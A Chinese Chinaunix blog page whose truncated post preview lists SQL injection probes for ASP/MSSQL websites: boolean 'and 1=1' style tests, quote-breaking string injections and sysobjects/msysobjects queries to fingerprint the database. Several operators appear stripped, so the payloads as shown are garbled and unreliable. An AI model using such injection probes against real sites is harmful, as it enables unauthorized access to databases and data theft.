Chinaunix首页 | 论坛 | 博客
  • 博客访问: 578
  • 博文数量: 1
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 20
  • 用 户 组: 普通用户
  • 注册时间: 2013-05-26 19:43
文章分类
文章存档

2014年(1)

我的朋友
最近访客

发布时间:2014-06-06 17:09:07

全面懂得ASP注入方式 1.判断是否有注入 ;and 11 ;and 12 2.初步断定是否是mssql ;and user 0 3.注入参数是字符 ’and .查询条件. and ’’’ 4.搜寻时没过滤参数的 ’and .查问前提. and ’25’’ 5.判断数据库系统 ;and (select count(.) from sysobjects) 0 mssql ;and (select count(.) from msysobjects.........【阅读全文】

阅读(62) | 评论(0) | 转发(0)
给主人留下些什么吧!~~
留言热议
请登录后留言。

登录 注册